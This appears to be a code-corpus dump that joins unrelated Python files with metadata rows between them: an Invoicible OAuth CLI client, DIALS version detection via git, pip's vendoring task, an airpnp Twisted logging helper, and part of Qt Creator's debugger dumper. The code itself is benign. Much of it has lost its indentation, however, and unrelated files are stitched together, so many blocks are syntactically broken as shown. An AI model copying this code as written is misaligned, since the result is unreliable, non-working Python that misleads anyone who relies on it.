oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, self._request_token)
self.connection.request(oauth_request.http_method, self.access_token_path, headers=oauth_request.to_header())
response = self.connection.getresponse()
self.access_token = oauth.OAuthToken.from_string(response.read())
return self.access_token
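# A minimal usage sketch of the helper above (consumer keys and company domain
# are hypothetical):
#
#     helper = InvoicibleOAuthHelper('consumer-key', 'consumer-secret',
#                                    'mycompany.centrumfaktur.pl')
#     access_token = helper.authorize()   # opens a browser, then asks for the verifier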
class SimpleClientCommandLine(cmd.Cmd):
"""
    A really simple invoicible application. It allows listing and updating some resources through the API.
"""
def __init__(self, client, *args, **kwargs):
self.client = client
self.customer_manager = invoicible.CustomerManager(self.client)
self.estimate_manager = invoicible.EstimateManager(self.client)
self.invoice_manager = invoicible.InvoiceManager(self.client)
self.prompt = "invoicible$ "
        self.intro = "\nThis is a really simple invoicible API client. Type 'help' or '?' for usage hints.\n"
#cmd.Cmd is old style class
cmd.Cmd.__init__(self, *args, **kwargs)
def do_help(self, *args):
print "list"
#print "create"
print "delete"
print "quit"
def help_delete(self):
print "delete resource_uri"
def do_delete(self, line):
args = line.split()
if len(args) != 1:
return self.help_delete()
else:
self.client.delete_resource(args[0])
def help_list(self):
print "list invoices|estimates|customers"
def do_list(self, line):
args = line.split()
if len(args) != 1 or args[0] not in ['invoices', 'customers', 'estimates']:
return self.help_list()
if args[0] == 'customers':
result = self.customer_manager.all()
elif args[0] == 'estimates':
result = self.estimate_manager.all()
else:
result = self.invoice_manager.all()
pprint.pprint(result)
def complete_list(self, line, *args):
return [ command for command in ('invoices', 'customers', 'estimates') if command.startswith(line)]
def do_EOF(self, line):
print ""
return 1
do_quit = do_EOF
def run_example(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET_KEY,
access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET, company_domain=COMPANY_DOMAIN):
if not consumer_key or not consumer_secret:
print """
You have not provided application (oauth consumer) keys. Please search the invoicible API (centrumfaktur.pl/api)
documentation for testing keys (or generate new ones for your application in the invoicible service)
and put those values into this file (%s) as CONSUMER_KEY and CONSUMER_SECRET_KEY.
""" % (__file__)
sys.exit(1)
if not company_domain:
        company_domain = raw_input("Please provide the company domain whose resources you want to access (for example: mycompany.centrumfaktur.pl) - you can put it into this file as COMPANY_DOMAIN to skip this step in the future: ")
if not access_token_key and not access_token_secret:
print """
You have not provided an oauth access token which allows your application to access the given user's resources.
If you already have those keys generated, please put them into this file (%s) as ACCESS_TOKEN_KEY and
ACCESS_TOKEN_SECRET.
""" % (__file__)
if not ask("Do you want to generate access token ([y]/n)?"):
sys.exit(1)
oauth_helper = InvoicibleOAuthHelper(consumer_key, consumer_secret, company_domain)
access_token = oauth_helper.authorize()
access_token_key, access_token_secret = access_token.key, access_token.secret
print """
Please copy access token key: %s and access token secret: %s as ACCESS_TOKEN_KEY and ACCESS_TOKEN_SECRET
into this file (%s) so that next time you can skip the application authorization step.
""" % (access_token_key, access_token_secret, __file__)
if not company_domain:
        company_domain = raw_input("Please provide company domain (for example: mycompany.centrumfaktur.pl - you can put it into this file as COMPANY_DOMAIN):")
invoicible_client = invoicible.Client(
consumer_key,
consumer_secret,
access_token_key,
access_token_secret,
invoicible_domain = company_domain,
)
command_line = SimpleClientCommandLine(invoicible_client)
command_line.cmdloop()
if __name__ == "__main__":
run_example()
| lgpl-3.0 | -4,260,646,054,423,910,400 | 37.678571 | 225 | 0.664688 | false |
dials/dials | util/version.py | 1 | 4510 | # DIALS version numbers are constructed from
# 1. a common prefix
__dials_version_format = "DIALS %s"
# 2. the most recent annotated git tag (or failing that: a default string)
__dials_version_default = "3.5"
# 3. a dash followed by the number of commits since that tag
# 4. a dash followed by a lowercase 'g' and the current commit id
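# For example (hypothetical values): a 'git describe' result of v3.5.0-12-g56f9cd7
# means tag v3.5.0, 12 commits since that tag, at commit 56f9cd7; get_git_version()
# below rewrites this so that dials_version() reports something like
# "DIALS 3.5.12-g56f9cd7".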
def get_git_version(dials_path, treat_merges_as_single_commit=False):
import os
import subprocess
version = None
with open(os.devnull, "w") as devnull:
# Obtain name of the current branch. If this fails then the other commands will probably also fail
branch = (
subprocess.check_output(
["git", "branch", "--all", "--contains", "HEAD"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
releasebranch = "dials-3" in branch
# Always treat merges as single commit on release branches
if releasebranch:
treat_merges_as_single_commit = True
# Get descriptive version string, eg. v1.1.0-1-g56f9cd7
if treat_merges_as_single_commit:
try:
# Get a 'correct' depth, which should be the shortest path to the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long", "--first-parent"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
except Exception:
pass # This is not supported on older git versions < 1.8.4.
if version is None:
# Find the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long"], cwd=dials_path, stderr=devnull
)
.rstrip()
.decode("latin-1")
)
if treat_merges_as_single_commit:
tag = version[: version.rindex("-", 0, version.rindex("-"))]
commit = version[version.rindex("-") + 1 :] # 'gxxxxxxx'
# Now find the first-parent-path
depth = subprocess.check_output(
["git", "rev-list", f"{tag}..HEAD", "--first-parent"],
cwd=dials_path,
stderr=devnull,
            ).rstrip().decode("latin-1")
if depth:
depth = depth.strip().count("\n") + 1
else:
depth = 0
version = "%s-%d-%s" % (tag, depth, commit)
# Turn descriptive version string into proper version number
if version[0] == "v":
version = version[1:].replace(".0-", "-")
version = version.replace("-", ".", 1)
# If we are on a release branch, then append a '-release'-tag
if releasebranch:
version = version + "-release"
return str(version)
# When run from a development installation the version information is extracted
# from the git repository. Otherwise it is read from the file '.gitversion' in the
# DIALS module directory.
def dials_version():
"""Try to obtain the current git revision number
and store a copy in .gitversion"""
version = None
try:
import os
dials_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
version_file = os.path.join(dials_path, ".gitversion")
# 1. Try to access information in .git directory
# Regenerate .gitversion if possible
if not os.environ.get("DIALS_SKIP_GIT_VERSIONING") and os.path.exists(
os.path.join(dials_path, ".git")
):
try:
version = get_git_version(dials_path)
with open(version_file, "w") as gv:
gv.write(version)
except Exception:
if version == "":
version = None
# 2. If .git directory missing or 'git describe' failed, read .gitversion
if (version is None) and os.path.exists(version_file):
with open(version_file) as gv:
version = gv.read().rstrip()
except Exception:
pass
if version is None:
version = __dials_version_format % __dials_version_default
else:
version = __dials_version_format % version
return version
| bsd-3-clause | 3,118,716,970,657,075,000 | 35.967213 | 106 | 0.531486 | false |
sigmavirus24/pip | tasks/vendoring/__init__.py | 1 | 3688 | """"Vendoring script, python 3.5 needed"""
from pathlib import Path
import re
import shutil
import invoke
TASK_NAME = 'update'
FILE_WHITE_LIST = (
'Makefile',
'vendor.txt',
'__init__.py',
'README.rst',
)
def drop_dir(path):
shutil.rmtree(str(path))
def remove_all(paths):
for path in paths:
if path.is_dir():
drop_dir(path)
else:
path.unlink()
def log(msg):
print('[vendoring.%s] %s' % (TASK_NAME, msg))
def clean_vendor(ctx, vendor_dir):
# Old _vendor cleanup
remove_all(vendor_dir.glob('*.pyc'))
log('Cleaning %s' % vendor_dir)
for item in vendor_dir.iterdir():
if item.is_dir():
shutil.rmtree(str(item))
elif item.name not in FILE_WHITE_LIST:
item.unlink()
else:
log('Skipping %s' % item)
def rewrite_imports(package_dir, vendored_libs):
for item in package_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name.endswith('.py'):
rewrite_file_imports(item, vendored_libs)
def rewrite_file_imports(item, vendored_libs):
"""Rewrite 'import xxx' and 'from xxx import' for vendored_libs"""
text = item.read_text()
# Revendor pkg_resources.extern first
text = re.sub(r'pkg_resources.extern', r'pip._vendor', text)
for lib in vendored_libs:
text = re.sub(
r'(\n\s*)import %s' % lib,
r'\1from pip._vendor import %s' % lib,
text,
)
text = re.sub(
r'(\n\s*)from %s' % lib,
r'\1from pip._vendor.%s' % lib,
text,
)
item.write_text(text)
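# Illustrative before/after for the rewrites above, assuming 'six' is one of
# the detected vendored libs:
#
#     import six                  ->  from pip._vendor import six
#     from six.moves import map   ->  from pip._vendor.six.moves import map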
def apply_patch(ctx, patch_file_path):
log('Applying patch %s' % patch_file_path.name)
ctx.run('git apply %s' % patch_file_path)
def vendor(ctx, vendor_dir):
log('Reinstalling vendored libraries')
ctx.run(
'pip install -t {0} -r {0}/vendor.txt --no-compile'.format(
str(vendor_dir),
)
)
remove_all(vendor_dir.glob('*.dist-info'))
remove_all(vendor_dir.glob('*.egg-info'))
# Cleanup setuptools unneeded parts
(vendor_dir / 'easy_install.py').unlink()
drop_dir(vendor_dir / 'setuptools')
drop_dir(vendor_dir / 'pkg_resources' / '_vendor')
drop_dir(vendor_dir / 'pkg_resources' / 'extern')
# Drop interpreter and OS specific msgpack libs.
# Pip will rely on the python-only fallback instead.
remove_all(vendor_dir.glob('msgpack/*.so'))
# Detect the vendored packages/modules
vendored_libs = []
for item in vendor_dir.iterdir():
if item.is_dir():
vendored_libs.append(item.name)
elif item.name not in FILE_WHITE_LIST:
vendored_libs.append(item.name[:-3])
log("Detected vendored libraries: %s" % ", ".join(vendored_libs))
# Global import rewrites
log("Rewriting all imports related to vendored libs")
for item in vendor_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name not in FILE_WHITE_LIST:
rewrite_file_imports(item, vendored_libs)
# Special cases: apply stored patches
log("Apply patches")
patch_dir = Path(__file__).parent / 'patches'
for patch in patch_dir.glob('*.patch'):
apply_patch(ctx, patch)
@invoke.task(name=TASK_NAME)
def main(ctx):
git_root = Path(
ctx.run('git rev-parse --show-toplevel', hide=True).stdout.strip()
)
vendor_dir = git_root / 'pip' / '_vendor'
log('Using vendor dir: %s' % vendor_dir)
clean_vendor(ctx, vendor_dir)
vendor(ctx, vendor_dir)
log('Revendoring complete')
| mit | 8,446,935,301,462,685,000 | 26.729323 | 74 | 0.594902 | false |
provegard/airpnp | twisted/plugins/common.py | 1 | 3366 | # -*- coding: utf-8 -*-
# Copyright (c) 2011, Per Rovegård <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the authors nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import re
import inspect
import os.path
from zope.interface import implements
from twisted.internet import protocol
from twisted.python import log, usage
from twisted.plugin import IPlugin
from airpnp.config import config
# Log level if not specified
DEFAULT_LOG_LEVEL = 1
# Log level for Twisted's log messages
TWISTED_LOG_LEVEL = 4
class Options(usage.Options):
optParameters = [["configfile", "c", "~/.airpnprc", "The path to the Airpnp configuration file."]]
def get_calling_module():
frm = inspect.stack()[2][0]
try:
return inspect.getmodule(frm)
finally:
# http://docs.python.org/library/inspect.html#the-interpreter-stack
del frm
def patch_log(oldf):
def mylog(*message, **kw):
# Get the log level, if any
ll = kw.has_key('ll') and kw['ll'] or DEFAULT_LOG_LEVEL
# Adjust log level for Twisted's messages
module = get_calling_module().__name__
if module.startswith('twisted.') and not re.match("twisted\.plugins\..*_plugin", module):
ll = TWISTED_LOG_LEVEL
# Log if level is on or below the configured limit
if ll <= config.loglevel():
nkw = kw.copy()
nkw['system'] = "%s/%d" % (module, ll)
oldf(*message, **nkw)
return mylog
def tweak_twisted():
# Turn off noisiness on some of Twisted's classes
protocol.AbstractDatagramProtocol.noisy = False
protocol.Factory.noisy = False
# Patch logging to introduce log level support
log.msg = patch_log(log.msg)
def loadconfig(options):
rcfile = os.path.expanduser(options['configfile'])
didload = False
if os.path.isfile(rcfile):
with open(rcfile) as fd:
config.load(fd)
didload = True
return didload
| bsd-3-clause | 899,077,319,433,274,000 | 34.797872 | 102 | 0.707578 | false |
pivonroll/Qt_Creator | share/qtcreator/debugger/dumper.py | 1 | 74430 | ############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import os
import struct
import sys
import base64
import re
import time
import json
import inspect
if sys.version_info[0] >= 3:
xrange = range
toInteger = int
else:
toInteger = long
verbosity = 0
verbosity = 1
# Debugger start modes. Keep in sync with DebuggerStartMode in debuggerconstants.h
NoStartMode, \
StartInternal, \
StartExternal, \
AttachExternal, \
AttachCrashedExternal, \
AttachCore, \
AttachToRemoteServer, \
AttachToRemoteProcess, \
StartRemoteProcess, \
= range(0, 9)
# Known special formats. Keep in sync with DisplayFormat in debuggerprotocol.h
AutomaticFormat, \
RawFormat, \
SimpleFormat, \
EnhancedFormat, \
SeparateFormat, \
Latin1StringFormat, \
SeparateLatin1StringFormat, \
Utf8StringFormat, \
SeparateUtf8StringFormat, \
Local8BitStringFormat, \
Utf16StringFormat, \
Ucs4StringFormat, \
Array10Format, \
Array100Format, \
Array1000Format, \
Array10000Format, \
ArrayPlotFormat, \
CompactMapFormat, \
DirectQListStorageFormat, \
IndirectQListStorageFormat, \
= range(0, 20)
# Breakpoints. Keep synchronized with BreakpointType in breakpoint.h
UnknownType, \
BreakpointByFileAndLine, \
BreakpointByFunction, \
BreakpointByAddress, \
BreakpointAtThrow, \
BreakpointAtCatch, \
BreakpointAtMain, \
BreakpointAtFork, \
BreakpointAtExec, \
BreakpointAtSysCall, \
WatchpointAtAddress, \
WatchpointAtExpression, \
BreakpointOnQmlSignalEmit, \
BreakpointAtJavaScriptThrow, \
= range(0, 14)
def arrayForms():
return [ArrayPlotFormat]
def mapForms():
return [CompactMapFormat]
class ReportItem:
"""
Helper structure to keep temporary "best" information about a value
or a type scheduled to be reported. This might get overridden be
subsequent better guesses during a putItem() run.
"""
def __init__(self, value = None, encoding = None, priority = -100, elided = None):
self.value = value
self.priority = priority
self.encoding = encoding
self.elided = elided
def __str__(self):
return "Item(value: %s, encoding: %s, priority: %s, elided: %s)" \
% (self.value, self.encoding, self.priority, self.elided)
class Blob(object):
"""
Helper structure to keep a blob of bytes, possibly
in the inferior.
"""
def __init__(self, data, isComplete = True):
self.data = data
self.size = len(data)
self.isComplete = isComplete
def size(self):
return self.size
def toBytes(self):
"""Retrieves "lazy" contents from memoryviews."""
data = self.data
major = sys.version_info[0]
if major == 3 or (major == 2 and sys.version_info[1] >= 7):
if isinstance(data, memoryview):
data = data.tobytes()
if major == 2 and isinstance(data, buffer):
data = ''.join([c for c in data])
return data
def toString(self):
data = self.toBytes()
return data if sys.version_info[0] == 2 else data.decode("utf8")
def extractByte(self, offset = 0):
return struct.unpack_from("b", self.data, offset)[0]
def extractShort(self, offset = 0):
return struct.unpack_from("h", self.data, offset)[0]
def extractUShort(self, offset = 0):
return struct.unpack_from("H", self.data, offset)[0]
def extractInt(self, offset = 0):
return struct.unpack_from("i", self.data, offset)[0]
def extractUInt(self, offset = 0):
return struct.unpack_from("I", self.data, offset)[0]
def extractLong(self, offset = 0):
return struct.unpack_from("l", self.data, offset)[0]
# FIXME: Note these should take target architecture into account.
def extractULong(self, offset = 0):
return struct.unpack_from("L", self.data, offset)[0]
def extractInt64(self, offset = 0):
return struct.unpack_from("q", self.data, offset)[0]
def extractUInt64(self, offset = 0):
return struct.unpack_from("Q", self.data, offset)[0]
def extractDouble(self, offset = 0):
return struct.unpack_from("d", self.data, offset)[0]
def extractFloat(self, offset = 0):
return struct.unpack_from("f", self.data, offset)[0]
def warn(message):
print('bridgemessage={msg="%s"},' % message.replace('"', '$').encode("latin1"))
def showException(msg, exType, exValue, exTraceback):
warn("**** CAUGHT EXCEPTION: %s ****" % msg)
try:
import traceback
for line in traceback.format_exception(exType, exValue, exTraceback):
warn("%s" % line)
except:
pass
class Children:
def __init__(self, d, numChild = 1, childType = None, childNumChild = None,
maxNumChild = None, addrBase = None, addrStep = None):
self.d = d
self.numChild = numChild
self.childNumChild = childNumChild
self.maxNumChild = maxNumChild
self.addrBase = addrBase
self.addrStep = addrStep
self.printsAddress = True
if childType is None:
self.childType = None
else:
self.childType = d.stripClassTag(str(childType))
if not self.d.isCli:
self.d.put('childtype="%s",' % self.childType)
if childNumChild is None:
pass
#if self.d.isSimpleType(childType):
# self.d.put('childnumchild="0",')
# self.childNumChild = 0
#elif childType.code == PointerCode:
# self.d.put('childnumchild="1",')
# self.childNumChild = 1
else:
self.d.put('childnumchild="%s",' % childNumChild)
self.childNumChild = childNumChild
self.printsAddress = not self.d.putAddressRange(addrBase, addrStep)
def __enter__(self):
self.savedChildType = self.d.currentChildType
self.savedChildNumChild = self.d.currentChildNumChild
self.savedNumChild = self.d.currentNumChild
self.savedMaxNumChild = self.d.currentMaxNumChild
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentChildType = self.childType
self.d.currentChildNumChild = self.childNumChild
self.d.currentNumChild = self.numChild
self.d.currentMaxNumChild = self.maxNumChild
self.d.currentPrintsAddress = self.printsAddress
self.d.put(self.d.childrenPrefix)
def __exit__(self, exType, exValue, exTraceBack):
if not exType is None:
if self.d.passExceptions:
showException("CHILDREN", exType, exValue, exTraceBack)
self.d.putNumChild(0)
self.d.putSpecialValue("notaccessible")
if not self.d.currentMaxNumChild is None:
if self.d.currentMaxNumChild < self.d.currentNumChild:
self.d.put('{name="<incomplete>",value="",type="",numchild="0"},')
self.d.currentChildType = self.savedChildType
self.d.currentChildNumChild = self.savedChildNumChild
self.d.currentNumChild = self.savedNumChild
self.d.currentMaxNumChild = self.savedMaxNumChild
self.d.currentPrintsAddress = self.savedPrintsAddress
self.d.putNewline()
self.d.put(self.d.childrenSuffix)
return True
class PairedChildrenData:
def __init__(self, d, pairType, keyType, valueType, useKeyAndValue):
self.useKeyAndValue = useKeyAndValue
self.pairType = pairType
self.keyType = keyType
self.valueType = valueType
self.isCompact = d.isMapCompact(self.keyType, self.valueType)
self.childType = valueType if self.isCompact else pairType
ns = d.qtNamespace()
keyTypeName = d.stripClassTag(str(self.keyType))
self.keyIsQString = keyTypeName == ns + "QString"
self.keyIsQByteArray = keyTypeName == ns + "QByteArray"
self.keyIsStdString = keyTypeName == "std::string" \
or keyTypeName.startswith("std::basic_string<char")
class PairedChildren(Children):
def __init__(self, d, numChild, useKeyAndValue = False,
pairType = None, keyType = None, valueType = None, maxNumChild = None):
self.d = d
if keyType is None:
keyType = d.templateArgument(pairType, 0).unqualified()
if valueType is None:
valueType = d.templateArgument(pairType, 1)
d.pairData = PairedChildrenData(d, pairType, keyType, valueType, useKeyAndValue)
Children.__init__(self, d, numChild,
d.pairData.childType,
maxNumChild = maxNumChild,
addrBase = None, addrStep = None)
def __enter__(self):
self.savedPairData = self.d.pairData if hasattr(self.d, "pairData") else None
Children.__enter__(self)
def __exit__(self, exType, exValue, exTraceBack):
Children.__exit__(self, exType, exValue, exTraceBack)
self.d.pairData = self.savedPairData if self.savedPairData else None
class SubItem:
def __init__(self, d, component):
self.d = d
self.name = component
self.iname = None
def __enter__(self):
self.d.enterSubItem(self)
def __exit__(self, exType, exValue, exTraceBack):
return self.d.exitSubItem(self, exType, exValue, exTraceBack)
class NoAddress:
def __init__(self, d):
self.d = d
def __enter__(self):
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentPrintsAddress = False
def __exit__(self, exType, exValue, exTraceBack):
self.d.currentPrintsAddress = self.savedPrintsAddress
class TopLevelItem(SubItem):
def __init__(self, d, iname):
self.d = d
self.iname = iname
self.name = None
class UnnamedSubItem(SubItem):
def __init__(self, d, component):
self.d = d
self.iname = "%s.%s" % (self.d.currentIName, component)
self.name = None
class DumperBase:
def __init__(self):
self.isCdb = False
self.isGdb = False
self.isLldb = False
self.isCli = False
# Later set, or not set:
self.stringCutOff = 10000
self.displayStringLimit = 100
self.resetCaches()
self.childrenPrefix = 'children=['
self.childrenSuffix = '],'
self.dumpermodules = [
"qttypes",
"stdtypes",
"misctypes",
"boosttypes",
"creatortypes",
"personaltypes",
]
def resetCaches(self):
# This is a cache mapping from 'type name' to 'display alternatives'.
self.qqFormats = { "QVariant (QVariantMap)" : mapForms() }
# This is a cache of all known dumpers.
self.qqDumpers = {} # Direct type match
self.qqDumpersEx = {} # Using regexp
# This is a cache of all dumpers that support writing.
self.qqEditable = {}
# This keeps canonical forms of the typenames, without array indices etc.
self.cachedFormats = {}
# Maps type names to static metaobjects. If a type is known
# to not be QObject derived, it contains a 0 value.
self.knownStaticMetaObjects = {}
def putNewline(self):
pass
def stripClassTag(self, typeName):
if typeName.startswith("class "):
return typeName[6:]
if typeName.startswith("struct "):
return typeName[7:]
if typeName.startswith("const "):
return typeName[6:]
if typeName.startswith("volatile "):
return typeName[9:]
return typeName
def stripForFormat(self, typeName):
if typeName in self.cachedFormats:
return self.cachedFormats[typeName]
stripped = ""
inArray = 0
for c in self.stripClassTag(typeName):
if c == '<':
break
if c == ' ':
continue
if c == '[':
inArray += 1
elif c == ']':
inArray -= 1
if inArray and ord(c) >= 48 and ord(c) <= 57:
continue
stripped += c
self.cachedFormats[typeName] = stripped
return stripped
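    # Illustrative inputs/outputs for stripForFormat() (hypothetical type names):
    # template arguments are cut off at '<', spaces and array sizes are dropped.
    #   "QList<int>"         -> "QList"
    #   "unsigned char [10]" -> "unsignedchar[]"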
# Hex decoding operating on str, return str.
def hexdecode(self, s):
if sys.version_info[0] == 2:
return s.decode("hex")
return bytes.fromhex(s).decode("utf8")
# Hex encoding operating on str or bytes, return str.
def hexencode(self, s):
if s is None:
s = ''
if sys.version_info[0] == 2:
return s.encode("hex")
if isinstance(s, str):
s = s.encode("utf8")
return base64.b16encode(s).decode("utf8")
#def toBlob(self, value):
# """Abstract"""
def is32bit(self):
return self.ptrSize() == 4
def is64bit(self):
return self.ptrSize() == 8
def isQt3Support(self):
# assume no Qt 3 support by default
return False
def lookupQtType(self, typeName):
return self.lookupType(self.qtNamespace() + typeName)
# Clamps size to limit.
def computeLimit(self, size, limit):
if limit == 0:
limit = self.displayStringLimit
if limit is None or size <= limit:
return 0, size
return size, limit
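    # For example: computeLimit(50, 100) -> (0, 50) since everything fits, while
    # computeLimit(5000, 100) -> (5000, 100), i.e. the true length plus the
    # clamped number of items to display.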
def vectorDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
else:
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = addr + 16
return data, size, alloc
def byteArrayDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
# QTypedArray:
# - QtPrivate::RefCount ref
# - int size
# - uint alloc : 31, capacityReserved : 1
# - qptrdiff offset
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
if self.ptrSize() == 4:
data = data & 0xffffffff
else:
data = data & 0xffffffffffffffff
elif self.qtVersion() >= 0x040000:
# Data:
# - QBasicAtomicInt ref;
# - int alloc, size;
# - [padding]
# - char *data;
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = self.extractPointer(addr + 8 + self.ptrSize())
else:
# Data:
# - QShared count;
# - QChar *unicode
# - char *ascii
# - uint len: 30
size = self.extractInt(addr + 3 * self.ptrSize()) & 0x3ffffff
alloc = size # pretend.
data = self.extractPointer(addr + self.ptrSize())
return data, size, alloc
# addr is the begin of a QByteArrayData structure
def encodeStringHelper(self, addr, limit):
# Should not happen, but we get it with LLDB as result
# of inferior calls
if addr == 0:
return 0, ""
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, 2 * shown)
def encodeByteArrayHelper(self, addr, limit):
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, shown)
def putCharArrayHelper(self, data, size, charSize,
displayFormat = AutomaticFormat,
makeExpandable = True):
bytelen = size * charSize
elided, shown = self.computeLimit(bytelen, self.displayStringLimit)
mem = self.readMemory(data, shown)
if charSize == 1:
if displayFormat == Latin1StringFormat \
or displayFormat == SeparateLatin1StringFormat:
encodingType = "latin1"
else:
encodingType = "utf8"
childType = "char"
elif charSize == 2:
encodingType = "utf16"
childType = "short"
else:
encodingType = "ucs4"
childType = "int"
self.putValue(mem, encodingType, elided=elided)
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat \
or displayFormat == SeparateFormat:
elided, shown = self.computeLimit(bytelen, 100000)
self.putDisplay(encodingType + ':separate', self.readMemory(data, shown))
if makeExpandable:
self.putNumChild(size)
if self.isExpanded():
with Children(self):
for i in range(size):
self.putSubItem(size, data[i])
def readMemory(self, addr, size):
data = self.extractBlob(addr, size).toBytes()
return self.hexencode(data)
def encodeByteArray(self, value, limit = 0):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), limit)
return data
def byteArrayData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def putByteArrayValue(self, value):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), self.displayStringLimit)
self.putValue(data, "latin1", elided=elided)
def encodeString(self, value, limit = 0):
elided, data = self.encodeStringHelper(self.extractPointer(value), limit)
return data
def encodedUtf16ToUtf8(self, s):
return ''.join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 4)])
def encodeStringUtf8(self, value, limit = 0):
return self.encodedUtf16ToUtf8(self.encodeString(value, limit))
def stringData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def encodeStdString(self, value, limit = 0):
data = value["_M_dataplus"]["_M_p"]
sizePtr = data.cast(self.sizetType().pointer())
size = int(sizePtr[-3])
alloc = int(sizePtr[-2])
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return self.readMemory(data, shown)
def extractTemplateArgument(self, typename, position):
level = 0
skipSpace = False
inner = ''
for c in typename[typename.find('<') + 1 : -1]:
if c == '<':
inner += c
level += 1
elif c == '>':
level -= 1
inner += c
elif c == ',':
if level == 0:
if position == 0:
return inner.strip()
position -= 1
inner = ''
else:
inner += c
skipSpace = True
else:
if skipSpace and c == ' ':
pass
else:
inner += c
skipSpace = False
# Handle local struct definitions like QList<main(int, char**)::SomeStruct>
inner = inner.strip()
p = inner.find(')::')
if p > -1:
inner = inner[p+3:]
return inner
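    # Illustrative inputs/outputs (hypothetical type name):
    #   extractTemplateArgument("QMap<QString, QList<int> >", 0) -> "QString"
    #   extractTemplateArgument("QMap<QString, QList<int> >", 1) -> "QList<int>"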
def putStringValueByAddress(self, addr):
elided, data = self.encodeStringHelper(addr, self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putStringValue(self, value):
elided, data = self.encodeStringHelper(
self.extractPointer(value),
self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putAddressItem(self, name, value, type = ""):
with SubItem(self, name):
self.putValue("0x%x" % value)
self.putType(type)
self.putNumChild(0)
def putIntItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("int")
self.putNumChild(0)
def putBoolItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("bool")
self.putNumChild(0)
def putGenericItem(self, name, type, value, encoding = None):
with SubItem(self, name):
self.putValue(value, encoding)
self.putType(type)
self.putNumChild(0)
def putCallItem(self, name, value, func, *args):
try:
result = self.callHelper(value, func, args)
with SubItem(self, name):
self.putItem(result)
except:
with SubItem(self, name):
self.putSpecialValue("notcallable");
self.putNumChild(0)
def call(self, value, func, *args):
return self.callHelper(value, func, args)
def putAddressRange(self, base, step):
try:
            if base is not None and step is not None:
self.put('addrbase="0x%x",' % toInteger(base))
self.put('addrstep="0x%x",' % toInteger(step))
return True
except:
#warn("ADDRBASE: %s" % base)
#warn("ADDRSTEP: %s" % step)
pass
return False
